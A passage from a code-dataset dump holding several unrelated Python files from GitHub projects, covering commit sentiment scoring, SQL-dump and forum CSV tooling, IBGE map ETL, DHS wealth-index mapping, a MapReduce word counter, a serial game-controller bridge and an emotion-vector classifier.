compound score to generate score for each message\n then return the average sentiment score for a given repo\"\"\"\n\n curs = conn.cursor()\n text_query = f\"\"\"SELECT BodyText FROM PullRequests \n WHERE RepoName = '{name}'\"\"\"\n curs.execute(text_query)\n #Collect messages, convert to strings then replace punct\n text = pd.DataFrame(curs.fetchall(), columns=['text'])\n text['text'] = text['text'].astype(str).str.replace(\"[^\\w\\s]\",\"\")\n #Ensure none of the messages are empty\n text = text[text[\"text\"] != \"\"]\n text['text'] = text['text'].str.lower()\n text['text_lemmatized'] = text['text'].apply(lemmatize_text)\n #Generate scores, create list of compound scores, then return average\n sid = SentimentIntensityAnalyzer()\n scores = []\n for i in text[\"text_lemmatized\"]:\n score = sid.polarity_scores(i)\n scores.append(score)\n compounds = [x['compound'] for x in scores]\n if len(compounds) == 0:\n return \"You don't have any commit messages with body text!\"\n else:\n avg = sum(compounds)/len(compounds)\n return avg \n\n","repo_name":"BloomTech-Labs/github-commit-analysis-ds","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32967859024","text":"#!/usr/bin/env python2\n\"\"\"DB Tool\n\nUsage:\n dbtool.py --showtables <file_path>\n dbtool.py --extract <file_path> --tables=tables [--encoding=enc]\n dbtool.py --extract <file_path> --tables=tables [--schema] [--encoding=enc]\n dbtool.py --mergeuser [--exit-on-error] [--user_id=user_id] [--pm_id=pm_id] [--pm_file_path=pm_file_path] <user_file_path> <csv_file_path>\n dbtool.py --json --type=type [--exit-on-error] [--forum=forum] \\\n [--topic=topic] [--recipient=recipient] [--pm=pm] \\\n --input=input\n\nOptions:\n -h --help Show this screen.\n --version Show version.\n --schema Export only schema\n --encoding=enc Encoding for sql parser\n --exit-on-error Exit if error happen\n --input=input Input for csv to json\n --forum=forum Input for post csv to json\n --topic=topic Input for post csv to json\n --recipient=recipient Input for pm csv to json\n --pm=pm Input for pm csv to json\n\"\"\"\nimport os\nimport re\nimport logging\nimport sys\n\nfrom docopt import docopt\nfrom tqdm import tqdm\nfrom dbtools.sql_to_csv import parse\nfrom dbtools.merge_user import (\n read_users,\n read_pm_user_ids,\n merge_users,\n merge_users_from_pm\n)\n\n__version__ = '0.1.0'\n__license__ = \"\"\"\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\n# Logging format\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(\n logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n)\n\n# Logging handler\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(handler)\n\nget_table = re.compile(\n \"(?<=CREATE\\sTABLE\\s\\`).*?(?=\\`\\s)\",\n re.IGNORECASE\n)\n\n\ndef post_to_json(**kwargs):\n \"\"\"\n Handle convert merge csv of post to json\n :param kwargs:\n :return:\n \"\"\"\n\n # Import msg_to_json\n from dbtools.msg_to_json import (\n read_topics,\n msg_to_json\n )\n\n # Load variables\n csv_path = kwargs.get(\"csv_path\")\n exit_on_error = kwargs.get(\"exit_on_error\")\n forum = kwargs.get(\"forum\")\n\n # Read topics\n topic = kwargs.get(\"topic\")\n if topic:\n topic = read_topics(topic)\n\n # Iterate csv file\n for file_path in csv_path.split(\",\"):\n try:\n msg_to_json(\n file_path,\n forum,\n topic\n )\n except KeyboardInterrupt:\n logger.debug(\"Control-C pressed...\")\n sys.exit(138)\n except Exception as error:\n if exit_on_error:\n raise\n logger.debug(\n \"%s ERROR:%s\" % (file_path, error)\n )\n\n\ndef msg_to_json(**kwargs):\n \"\"\"\n Handle convert merge csv of message to json\n :param kwargs:\n :return:\n \"\"\"\n # Import pm_to_json\n from dbtools.pm_to_json import (\n read_pm_recipients,\n read_pm,\n msg_to_json\n )\n\n # Load variables\n csv_path = kwargs.get(\"csv_path\")\n exit_on_error = kwargs.get(\"exit_on_error\")\n\n # Read recipients\n pm_recipients = kwargs.get(\"pm_recipients\")\n if pm_recipients:\n pm_recipients = read_pm_recipients(pm_recipients)\n\n # Read pm text\n pmtext_pms = kwargs.get(\"pmtext_pms\")\n if pmtext_pms:\n pmtext_pms = read_pm(pmtext_pms)\n\n # Iterate csv file\n for file_path in csv_path.split(\",\"):\n try:\n msg_to_json(\n file_path,\n pm_recipients,\n pmtext_pms\n )\n except KeyboardInterrupt:\n logger.debug(\"Control-C pressed...\")\n sys.exit(138)\n except Exception as error:\n if exit_on_error:\n raise\n logger.debug(\n \"%s ERROR:%s\" % (file_path, error)\n )\n\n\ndef mergeuser(**kwargs):\n \"\"\"\n Handle merge user csv\n :param kwargs:\n :return:\n \"\"\"\n\n # Load param\n user_file_path = kwargs.get(\n \"user_file_path\"\n )\n csv_files_path = kwargs.get(\n \"csv_files_path\"\n )\n pm_file_path = kwargs.get(\n \"pm_file_path\"\n )\n exit_on_error = kwargs.get(\n \"exit_on_error\"\n )\n user_id = kwargs.get(\n \"user_id\"\n )\n pm_id = kwargs.get(\n \"pm_id\"\n )\n\n # Load users\n users, username_column = read_users(user_file_path)\n if not users:\n sys.exit(1)\n\n # Load pm ids if exist\n if pm_file_path:\n pm_user_ids = read_pm_user_ids(pm_file_path)\n\n for csv_file in csv_files_path.split(\",\"):\n try:\n if not pm_file_path:\n merge_users(\n csv_file,\n users,\n username_column,\n user_id\n )\n else:\n merge_users_from_pm(\n filepath=csv_file,\n pm_user_ids=pm_user_ids,\n users=users,\n username_column=username_column,\n pm_id=pm_id\n )\n except KeyboardInterrupt:\n logger.info(\"Control-C pressed...\")\n sys.exit(138)\n except Exception as error:\n if exit_on_error:\n raise\n\n logger.info(\"%s ERROR:%s\" % (csv_file, error))\n\n\ndef show_tables(**kwargs):\n \"\"\"\n Handle export all tables from sql dump\n :param kwargs:\n file_path => string: path to sql dump\n :return: => string: list of all tables logged\n \"\"\"\n filepath = kwargs.get(\"<file_path>\")\n\n # Table pool init\n tables = []\n\n # Load progress bar\n pbar = tqdm(\n desc=\"Parsing %s\" % filepath,\n total=os.path.getsize(filepath),\n unit=\"b\",\n unit_scale=True\n )\n\n # Load sql dump\n with open(filepath, \"rb\") as f:\n # Iterate over line of sql dump\n for line in f:\n # Update iteration process over sql dump\n pbar.update(len(line))\n\n # If line not have create table, continue\n if not line.startswith(\"CREATE TABLE\"):\n continue\n\n # Parse table name\n table = get_table.search(line).group()\n\n # If already found this table then continue else append to tables pool\n if table in tables:\n logger.info(\n \"Found table: %s but already exist!\" % table\n )\n else:\n logger.info(\n \"New table found: %s\" % table\n )\n tables.append(table)\n\n # Close progress bar\n pbar.close()\n\n # Log all tables\n logger.info(\n \"All tables: %s\" % \", \".join(tables)\n )\n\n\ndef main(args):\n \"\"\"\n Main process handle all parameter from command line\n :param args:\n :return:\n \"\"\"\n # Handle show tables\n if args.get(\"--showtables\"):\n show_tables(**args)\n\n # Handle extract detail tables\n if args.get(\"--extract\") and args.get(\"--tables\"):\n parse(\n filepath=args.get(\"<file_path>\"),\n tables=args.get(\"--tables\"),\n encoding=args.get(\"--encoding\"),\n schema_only=args.get(\"--schema\")\n )\n\n # Handle merge user csv\n if args.get(\"--mergeuser\"):\n mergeuser(\n user_file_path=args.get(\"<user_file_path>\"),\n csv_files_path=args.get(\"<csv_file_path>\"),\n pm_file_path=args.get(\"--pm_file_path\"),\n exit_on_error=args.get(\"--exit-on-error\"),\n user_id=args.get(\"--user_id\"),\n pm_id=args.get(\"--pm_id\")\n )\n\n # Handle csv to json\n if args.get(\"--json\"):\n csv_type = args.get(\"--type\")\n\n if csv_type not in [\"pm\", \"post\"]:\n raise ValueError(\"Either: post or pm.\")\n\n if csv_type == \"pm\":\n msg_to_json(\n csv_path=args.get(\"--input\"),\n exit_on_error=args.get(\"--exit_on_error\"),\n pm_recipients=args.get(\"--recipient\"),\n pmtext_pms=args.get(\"--pm\")\n )\n elif csv_type == \"post\":\n post_to_json(\n csv_path=args.get(\"--input\"),\n exit_on_error=args.get(\"--exit_on_error\"),\n forum=args.get(\"--forum\"),\n topic=args.get(\"--topic\")\n )\n\n\nif __name__ == \"__main__\":\n args = docopt(__doc__, version=__version__)\n main(args)\n","repo_name":"soft-top-notch/DataCleaner","sub_path":"dbtool.py","file_name":"dbtool.py","file_ext":"py","file_size_in_byte":8831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20655435994","text":"import abc\nimport os\nimport typing\nfrom pathlib import Path\n\nimport geopandas as gpd\n\nfrom ._base import _BaseFTPIBGE\nfrom ._base import extrai_link\n\n\nclass _BaseMalhaIBGE(_BaseFTPIBGE, abc.ABC):\n \"\"\"\n Classe que foi estruturada para realizar o download e processamento\n de dados de uma malha geográfica do IBGE\n \"\"\"\n\n URL_BASE: typing.Dict[str, str] = {\n \"mun\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n \"uf\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n \"meso\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n \"micro\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n \"brasil\": \"organizacao_do_territorio/malhas_territoriais/malhas_municipais\",\n }\n\n GRANULARIDADE: typing.Dict[str, str] = {\n \"mun\": \"municipio_{ano}/Brasil/BR\",\n \"uf\": \"municipio_{ano}/Brasil/BR\",\n \"meso\": \"municipio_{ano}/Brasil/BR\",\n \"micro\": \"municipio_{ano}/Brasil/BR\",\n \"brasil\": \"municipio_{ano}/Brasil/BR\",\n }\n\n BASE: typing.Dict[str, str] = {\n \"mun\": \"BR_Municipios_{ano}.zip\",\n \"uf\": \"BR_UF_{ano}.zip\",\n \"meso\": \"BR_Mesorregioes_{ano}.zip\",\n \"micro\": \"BR_Microrregioes_{ano}.zip\",\n \"brasil\": \"BR_Pais_{ano}.zip\",\n }\n\n _ano: typing.Union[int, str]\n _granularidade: str\n\n def __init__(\n self,\n entrada: typing.Union[str, Path],\n saida: typing.Union[str, Path],\n granularidade: str,\n ano: typing.Union[int, str] = \"ultimo\",\n criar_caminho: bool = True,\n reprocessar: bool = False,\n ) -> None:\n \"\"\"\n Instância o objeto de ETL INEP\n\n :param entrada: string com caminho para pasta de entrada\n :param saida: string com caminho para pasta de saída\n :param granularidade: nível geográfico a ser processado\n :param ano: ano da pesquisa a ser processado (pode ser um inteiro ou 'ultimo')\n :param criar_caminho: flag indicando se devemos criar os caminhos\n :param reprocessar: flag para forçar o re-processamento das bases de dados\n \"\"\"\n assert granularidade in self.GRANULARIDADE\n self._ano = ano\n self._granularidade = granularidade\n url = (\n self.URL_BASE[granularidade]\n + \"/\"\n + self.GRANULARIDADE[granularidade].format(ano=self.ano)\n )\n super().__init__(\n entrada=entrada,\n saida=saida,\n sub_pasta=\"malha\",\n url=url,\n geo=True,\n base=self.BASE[granularidade].format(ano=self.ano),\n criar_caminho=criar_caminho,\n reprocessar=reprocessar,\n )\n\n def tem_dados_saida(self) -> bool:\n \"\"\"\n Verifica se o objeto ETL possuí todos os dados que fazem\n parte da sua saída\n\n :return: True se os dados estiver disponíveis\n \"\"\"\n saidas = set(os.listdir(self.caminho_saida))\n if saidas.issuperset(set(self.bases_saida)):\n for b in self.bases_saida:\n sub = os.listdir(self.caminho_saida / b)\n if f\"ANO={self.ano}\" not in sub:\n return False\n elif f\"{self.ano}.parquet\" not in os.listdir(\n self.caminho_saida / f\"{b}/ANO={self.ano}\"\n ):\n return False\n return True\n else:\n return False\n\n def carrega_saidas(self) -> None:\n \"\"\"\n Carrega os dados de saída no dicionário de dados de saída\n caso as mesmas existam\n \"\"\"\n if self.tem_dados_saida():\n self._dados_saida = {\n arq: gpd.read_parquet(\n self.caminho_saida / f\"{arq}/ANO={self.ano}\"\n ).assign(ANO=self.ano)\n for arq in self.bases_saida\n }\n\n @property\n def ano(self) -> int:\n \"\"\"\n Ano da base sendo processado pelo objeto\n\n :return: ano como um número inteiro\n \"\"\"\n if isinstance(self._ano, str):\n if self._ano == \"ultimo\":\n anos = [\n int(a.replace(\"municipio_\", \"\").replace(\"/\", \"\"))\n for a in extrai_link(\n self.URL_GEO + \"/\" + self.URL_BASE[self._granularidade]\n )\n ]\n self._ano = sorted(anos)[-1]\n else:\n if self._ano.isnumeric():\n self._ano = int(self._ano)\n else:\n raise ValueError(f\"Não conseguimos processar ano={self._ano}\")\n return self._ano\n\n def _load(self) -> None:\n \"\"\"\n Exporta os dados transformados\n \"\"\"\n for arq, df in self.dados_saida.items():\n (self.caminho_saida / f\"{arq}/ANO={self.ano}\").mkdir(\n parents=True, exist_ok=True\n )\n\n df.drop(columns=\"ANO\").to_parquet(\n self.caminho_saida / f\"{arq}/ANO={self.ano}/{self.ano}.parquet\",\n index=False,\n )\n","repo_name":"Ignorancia-Zero/curso-ciencia-dados-treino","sub_path":"src/aquisicao/ibge/_malha.py","file_name":"_malha.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"pt","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"7344896267","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 14:47:41 2022\n\n@author: janinedevera\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport geopandas as gpd\nimport fiona\nimport os, glob\n\n\n## DIRECTORIES\n\nmain = '/Users/janinedevera/Documents/School/MDS 2021-2023/Semester 2/3 Machine Learning/Project/Poverty/'\nrepo = main + 'ML-SS22/'\nmaps = main + 'Data/Maps/'\ngdrive = '/Volumes/GoogleDrive/Shared drives/ML Project_Satellite Images and Poverty/'\ndhs_vars = 'Outcome/Wealth Index/'\ndhs_geo = 'Outcome/Geo Data/'\nfinal_out = 'Outcome/Final Outcome/'\n\n## OUTCOME VARIABLES\n\n # wealth index\nos.chdir(gdrive + dhs_vars)\n\nextension = 'DTA'\nwealth_filenames = [i for i in glob.glob('*.{}'.format(extension))]\n\nwealth_all = pd.concat([pd.read_stata(f) for f in wealth_filenames])\nwealth = wealth_all[[\"hv000\", \"hv001\", \"hv007\", \"hv270\", \"hv271\", \"hv270a\", \"hv271a\"]]\nwealth['hv000'] = wealth['hv000'].str.replace('7', '')\nwealth['mergeid'] = wealth['hv000'] + '-' + wealth['hv001'].map(str)\n\n # geotags\nos.chdir(gdrive + dhs_geo)\n\nextension = 'shp'\ngeo_filenames = [i for i in glob.glob('*.{}'.format(extension))]\n\ngeo_all = pd.concat([gpd.read_file(f) for f in geo_filenames])\ngeo_all['mergeid'] = geo_all['DHSCC'] + '-' + geo_all['DHSCLUST'].astype(int).astype(str)\n\n # merge wealth data with geodata\noutcome_gdf = geo_all.merge(wealth, left_on = 'mergeid', right_on='mergeid')\n\n # create geoid\noutcome_gdf = outcome_gdf[[\"DHSID\", \"hv000\", \"LATNUM\", \"LONGNUM\", \"geometry\", \"hv270a\", \"hv271\"]]\noutcome_gdf['hv271'] = (outcome_gdf['hv271'] / 100000)\noutcome_gdf.rename(columns = {'hv000':'country', 'hv270a':'category', 'hv271':'wealth'}, inplace = True)\noutcome_gdf['category'] = outcome_gdf['category'].astype(str)\n\n # save\nos.chdir(repo)\noutcome_gdf.to_file(\"outcome_gdf.shp\")\n\n # ethiopia\neth_gdf = outcome_gdf[outcome_gdf['country'] == 'ET']\neth_gdf.to_file(\"eth_gdf.shp\")\n\n # malawi\nmlw_gdf = outcome_gdf[outcome_gdf['country'] == 'MW']\nmlw_gdf.to_file(\"mlw_gdf.shp\")\n\n # mali\nmli_gdf = outcome_gdf[outcome_gdf['country'] == 'ML']\nmli_gdf.to_file(\"mli_gdf.shp\")\n\n # nigeria\nngr_gdf = outcome_gdf[outcome_gdf['country'] == 'NG']\nngr_gdf.to_file(\"ngr_gdf.shp\")\n\n\n\n####### MAPS\n\n # read final outcome geodf \neth_gdf = gpd.read_file(gdrive + final_out + 'eth_gdf.shp')\nmlw_gdf = gpd.read_file(gdrive + final_out + 'mlw_gdf.shp')\nmli_gdf = gpd.read_file(gdrive + final_out + 'mli_gdf.shp')\nngr_gdf = gpd.read_file(gdrive + final_out + 'ngr_gdf.shp')\n\n # read country map\nmlw_map = gpd.read_file(maps + 'Malawi/mwi_admbnda_adm3_nso_20181016.shp')\neth_map = gpd.read_file(maps + 'Ethiopia/eth_admbnda_adm2_csa_bofedb_2021.shp')\nmli_map = gpd.read_file(maps + 'Mali/mli_admbnda_adm3_1m_gov_20211220.shp')\nngr_map = gpd.read_file(maps + 'Nigeria/NER_adm02_feb2018.shp')\n\n\n # gdf set up \ndef genid (geodf):\n geodf['geoid'] = (~geodf.geometry.duplicated()).cumsum()\n return geodf\n\n # map function \ndef genmaps (geodf, shp):\n coord = geodf[[\"geoid\", \"geometry\"]]\n clus = geodf.groupby([\"geoid\"]).mean().reset_index()\n clus = pd.merge(coord, clus).drop_duplicates()\n join = gpd.sjoin(clus, shp, how = 'right', predicate = 'within')\n join = join[join['wealth'].notna()]\n img = join.plot(alpha=0.7, column = \"wealth\", cmap = \"RdYlGn\", legend=True, figsize=(6,8),\n legend_kwds={'label': \"Wealth Index\"})\n img.set_axis_off();\n return img\n\n\n ## malawi\nmlw_gdf = genid(mlw_gdf)\nmlw_img = genmaps(mlw_gdf, mlw_map)\n\n ## ethiopia\neth_gdf = genid(eth_gdf)\neth_img = genmaps(eth_gdf, eth_map)\n\n ## mali\nmli_gdf = genid(mli_gdf)\nmli_img = genmaps(mli_gdf, mli_map)\n\n ## nigeria\nngr_gdf = genid(ngr_gdf)\nngr_img = genmaps(ngr_gdf, ngr_map)\n\n\n\n\n\n \n \n \n \n\n","repo_name":"ccepelak/ML-SS22","sub_path":"wealth_index_all.py","file_name":"wealth_index_all.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23494297818","text":"#!/usr/bin/env python2\n\nimport csv\nimport glob\nimport os.path\nimport string\nimport sys\n\nimport mincemeat as mm\n\n\ndef readall(fname):\n with open(fname, 'r') as f:\n return f.read()\n\n\ndef run_server(docs, docnames):\n rdr = {docname: readall(fname).translate(None, string.punctuation) for fname, docname in zip(docs, docnames)}\n\n s = mm.Server()\n s.datasource = rdr\n s.mapfn = mapfn\n s.reducefn = eval(reducefn_template % docnames)\n\n return s.run_server()\n\n\ndef mapfn(k, v):\n import nltk.tokenize as tkz\n\n for w in tkz.wordpunct_tokenize(v):\n yield w.lower(), k\n\n\nreducefn_template = 'lambda k, vs: map(vs.count, %s)'\n\n\nif __name__ == '__main__':\n docs = glob.glob(os.path.join(sys.argv[1], '*'))\n docnames = [os.path.splitext(os.path.basename(x))[0] for x in docs]\n\n out = run_server(docs, docnames)\n\n with open(sys.argv[2], 'w') as outf:\n wr = csv.writer(outf)\n wr.writerow(['Term'] + docnames)\n wr.writerows([[k] + v for k, v in out.iteritems()])\n","repo_name":"dsavelyev/vpirod-mapreduce","sub_path":"sherlock.py","file_name":"sherlock.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34035458252","text":"import serial\nimport argparse\nimport time\nimport logging\nimport pyvjoy # Windows apenas\n\nclass MyControllerMap:\n def __init__(self):\n self.button = {'UP': 1, 'DOWN': 2, 'LEFT': 3, 'RIGHT': 4, 'RED': 5, 'YELLOW' : 6, 'GREEN': 7, 'BLUE': 8}\n\n\nclass SerialControllerInterface:\n\n # Protocolo\n # byte 1 -> id do botão\n # byte 2 -> status do botão\n # byte 3 -> byte mais significativo do valor do analógico\n # byte 5 -> byte menos significativo do valor do analógico\n # byte 5 -> EOP - End of Packet -> valor reservado 'X'\n\n def __init__(self, port, baudrate):\n self.ser = serial.Serial(port, baudrate=baudrate)\n self.mapping = MyControllerMap()\n self.j = pyvjoy.VJoyDevice(1)\n self.incoming = '0'\n\n def update(self):\n ## Sync protocol\n while self.incoming != b'X':\n self.incoming = self.ser.read()\n logging.debug(\"Received INCOMING: {}\".format(self.incoming))\n\n id = self.ser.read()\n button = self.ser.read()\n value1 = self.ser.read()\n value2 = self.ser.read()\n\n logging.debug(\"Received DATA: {}, button {}, value1 {}\".format(id, button, value1))\n\n # Protocolo do Handshake\n if button == b'W':\n self.ser.write(b'w')\n logging.info(\"Mandando w de volta pro microship\") \n\n if button == b'1':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['UP'], 1)\n\n if button == b'A':\n self.j.set_button(self.mapping.button['UP'], 0)\n\n if button == b'2':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['DOWN'], 1)\n if button == b'B':\n self.j.set_button(self.mapping.button['DOWN'], 0) \n\n if button == b'3':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['LEFT'], 1)\n if button == b'C':\n self.j.set_button(self.mapping.button['LEFT'], 0) \n\n if button == b'4':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['RIGHT'], 1)\n if button == b'D':\n self.j.set_button(self.mapping.button['RIGHT'], 0) \n\n if button == b'5':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['RED'], 1)\n if button == b'E':\n self.j.set_button(self.mapping.button['RED'], 0) \n\n if button == b'6':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['YELLOW'], 1)\n if button == b'F':\n self.j.set_button(self.mapping.button['YELLOW'], 0) \n\n if button == b'7':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['GREEN'], 1)\n if button == b'G':\n self.j.set_button(self.mapping.button['GREEN'], 0) \n\n if button == b'8':\n logging.info(\"Sending press\")\n self.j.set_button(self.mapping.button['BLUE'], 1)\n if button == b'H':\n self.j.set_button(self.mapping.button['BLUE'], 0) \n\n # Analógico esquerdo\n if button == b'Y':\n if id == b'I':\n conv_valor1 = int.from_bytes(value2 + value1, byteorder=\"big\")\n if (conv_valor1 > 3400 or conv_valor1 < 2000):\n self.j.set_axis(pyvjoy.HID_USAGE_X, conv_valor1*int(32762/4095))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_X, int(32762/2))\n\n if id == b'J':\n conv_valor2 = int.from_bytes(value2 + value1, byteorder=\"big\")\n if (conv_valor2 > 3400 or conv_valor2 < 2000):\n self.j.set_axis(pyvjoy.HID_USAGE_Y, conv_valor2*int(32762/4095))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_Y, int(32762/2))\n\n # Analógico direito\n if button == b'Z':\n if id == b'K':\n conv_valor3 = int.from_bytes(value2 + value1, byteorder=\"big\")\n if (conv_valor3 > 3400 or conv_valor3 < 2000):\n self.j.set_axis(pyvjoy.HID_USAGE_RX, conv_valor3*int(32762/4095))\n self.j.set_axis(pyvjoy.HID_USAGE_RZ, 32762 - conv_valor3*int(32762/4095))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_RX, int(32762/2))\n self.j.set_axis(pyvjoy.HID_USAGE_RZ, int(32762/2))\n \n if id == b'L':\n conv_valor4 = int.from_bytes(value2 + value1, byteorder=\"big\")\n if (conv_valor4 > 3400 or conv_valor4 < 2000):\n self.j.set_axis(pyvjoy.HID_USAGE_RY, conv_valor4*int(32762/4095))\n self.j.set_axis(pyvjoy.HID_USAGE_RZ, 32762 - conv_valor4*int(32762/4095))\n else:\n self.j.set_axis(pyvjoy.HID_USAGE_RY, int(32762/2))\n self.j.set_axis(pyvjoy.HID_USAGE_RZ, int(32762/2))\n\n self.incoming = self.ser.read()\n\n\nclass DummyControllerInterface:\n def __init__(self):\n self.mapping = MyControllerMap()\n self.j = pyvjoy.VJoyDevice(1)\n\n def update(self):\n self.j.set_button(self.mapping.button['A'], 1)\n time.sleep(0.1)\n self.j.set_button(self.mapping.button['A'], 0)\n logging.info(\"[Dummy] Pressed A button\")\n time.sleep(1)\n\n\nif __name__ == '__main__':\n interfaces = ['dummy', 'serial']\n argparse = argparse.ArgumentParser()\n argparse.add_argument('serial_port', type=str)\n argparse.add_argument('-b', '--baudrate', type=int, default=9600)\n argparse.add_argument('-c', '--controller_interface', type=str, default='serial', choices=interfaces)\n argparse.add_argument('-d', '--debug', default=False, action='store_true')\n args = argparse.parse_args()\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n\n print(\"Connection to {} using {} interface ({})\".format(args.serial_port, args.controller_interface, args.baudrate))\n if args.controller_interface == 'dummy':\n controller = DummyControllerInterface()\n else:\n controller = SerialControllerInterface(port=args.serial_port, baudrate=args.baudrate)\n\n while True:\n controller.update()\n","repo_name":"LidiaDomingos/Control-Impact","sub_path":"python/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27381393455","text":"import sys\nimport ast\nimport numpy as np\nimport csv\nimport random\nfrom sklearn.utils import shuffle\nimport math\nimport sys\n\ndef delta(emotion_vecs, v, covar, input_vec, N):\n output = np.linalg.slogdet(np.add(covar, N*np.matmul(v, v.T)))\n return output[0]*output[1]\n\ndef newsum(emotion_vecs, has_input, input_vec):\n current_sum = emotion_vecs[0]\n for vec in emotion_vecs[1:]:\n current_sum = np.add(current_sum, vec)\n if has_input:\n current_sum = np.add(current_sum, input_vec)\n return current_sum\n\ndef calculatek(emotion_vecs, v, covar, input_vec, N):\n return np.matmul(np.matmul(np.matmul((np.linalg.inv(np.add(covar, N*np.matmul(v, v.T)))), v), v.T), np.linalg.inv(covar))\n\ndef log_likelihood(emotion_vecs, mean, v, covar, input_vec):\n # subtract m from all vectors\n new_emotion_vecs = []\n for vec in emotion_vecs:\n new_emotion_vecs.append(np.subtract(vec, mean))\n new_emotion_vecs = np.array(new_emotion_vecs)\n input_vec = np.subtract(input_vec, mean)\n \n first_term = delta(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs) + 1)\n second_term = np.matmul(np.matmul(newsum(new_emotion_vecs, True, input_vec).T, calculatek(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs) + 1)), newsum(new_emotion_vecs, True, input_vec))\n third_term = delta(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs))\n fourth_term = np.matmul(np.matmul(newsum(new_emotion_vecs, False, input_vec).T, calculatek(new_emotion_vecs, v, covar, input_vec, len(new_emotion_vecs))), newsum(new_emotion_vecs, False, input_vec))\n fifth_term = delta(new_emotion_vecs, v, covar, input_vec, 1)\n sixth_term = 1/2*np.matmul(np.matmul(input_vec.T, calculatek(new_emotion_vecs, v, covar, input_vec, 1)), input_vec)\n\n ratio = -1*first_term - second_term + third_term + fourth_term + fifth_term + sixth_term\n\n return ratio\n\n\nmeld = open(\"meld_xvectors.csv\")\nreader = csv.reader(meld, delimiter=',')\n\ntrain = []\ntrain_labels = []\ntest = []\ntest_labels = []\nad = 0\nh = 0\ns = 0\nn = 0\nfs = 0\nad_val = []\nh_val = []\ns_val = []\nn_val = []\nfs_val = []\n\nline = 0\nfor row in reader:\n if line == 0:\n line += 1\n else:\n random_number = random.random()\n if random_number < 0.8 and len(train) < 10966:\n train.append(ast.literal_eval(row[4]))\n if row[2] == \"anger/disgust\":\n train_labels.append(0)\n ad += 1\n ad_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"happiness\":\n train_labels.append(1)\n h += 1\n h_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"sadness\":\n train_labels.append(2)\n s += 1\n s_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"neutral\":\n train_labels.append(3)\n n += 1\n n_val.append(ast.literal_eval(row[4]))\n elif row[2] == \"fear/surprise\":\n train_labels.append(4)\n fs += 1\n fs_val.append(ast.literal_eval(row[4]))\n else:\n test.append(ast.literal_eval(row[4]))\n if row[2] == \"anger/disgust\":\n test_labels.append(0)\n elif row[2] == \"happiness\":\n test_labels.append(1)\n elif row[2] == \"sadness\":\n test_labels.append(2)\n elif row[2] == \"neutral\":\n test_labels.append(3)\n elif row[2] == \"fear/surprise\":\n test_labels.append(4)\n line += 1\n\ntrain = np.array(train)\ntrain_labels = np.array(train_labels)\ntest = np.array(test)\ntest_labels = np.array(test_labels)\n\nx = shuffle(train, train_labels)\nnew_train = x[0]\nnew_train_labels = x[1]\ny = shuffle(test, test_labels)\nnew_test = y[0]\nnew_test_labels = y[1]\n\nnew_file_lda = open(\"output_lda\")\n# parameters of LDA\nmatrix = []\nfor row in new_file_lda:\n count = 0\n for x in row.split(\" \"):\n if x != '\\n' and x and x != ']\\n' and x != '[\\n':\n if count < 512:\n matrix.append(float(x))\n count += 1\nmatrix = np.array(matrix)\nmatrix = np.reshape(matrix, (512, 200))\n\n# put the train and test sets through LDA\nad_val = np.array(ad_val)\nh_val = np.array(h_val)\ns_val = np.array(s_val)\nn_val = np.array(n_val)\nfs_val = np.array(fs_val)\nad_val = np.matmul(ad_val, matrix)\nh_val = np.matmul(h_val, matrix)\ns_val = np.matmul(s_val, matrix)\nn_val = np.matmul(n_val, matrix)\nfs_val = np.matmul(fs_val, matrix)\nnew_test = 